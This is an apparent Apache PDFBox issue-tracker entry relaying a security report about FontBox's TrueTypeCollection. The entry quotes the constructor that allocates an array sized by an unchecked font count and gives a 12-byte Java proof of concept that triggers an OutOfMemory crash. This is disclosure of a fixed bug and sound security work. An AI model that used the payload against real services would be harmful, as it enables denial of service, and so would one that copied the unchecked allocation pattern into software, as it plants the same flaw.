Details
Bug
Status: Closed
Major
Resolution: Fixed
2.0.24, 3.0.0 PDFBox
None
Description
We got the following error report from Pinohans@JDArmy through security@
Description:
In FontBox of Apache PDFBox, a carefully crafted PDF
file can trigger an OutOfMemory-Exception while loading the file. This
issue affects Apache PDFBox version 1.8 to 3.0.0-alpha2.
Product: Apache PDFBox
Version: 1.8-3.0.0-alpha2
Affected component:
src/main/java/org/apache/fontbox/ttf/TrueTypeCollection.java
Vulnerability:
    TrueTypeCollection(TTFDataStream stream) throws IOException
    {
        this.stream = stream;

        // TTC header
        String tag = stream.readTag();
        if (!tag.equals("ttcf"))
        {
            throw new IOException("Missing TTC header");
        }
        float version = stream.read32Fixed();
        numFonts = (int)stream.readUnsignedInt(); // Vulnerability
        fontOffsets = new long[numFonts]; // Vulnerability
        for (int i = 0; i < numFonts; i++)
        {
            fontOffsets[i] = stream.readUnsignedInt();
        }
Attack vector:
    import org.apache.fontbox.ttf.TrueTypeCollection;
    import java.io.*;

    public class main
    {
        public static void main(String[] args) throws IOException
        {
            // "ttcf" tag, version 0.0, numFonts = 0x7FFFFFFF, no offset data
            byte[] payload = {0x74, 0x74, 0x63, 0x66, 0x00, 0x00, 0x00, 0x00, 0x7F, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF};
            TrueTypeCollection ttc = new TrueTypeCollection(new ByteArrayInputStream(payload));
        }
    }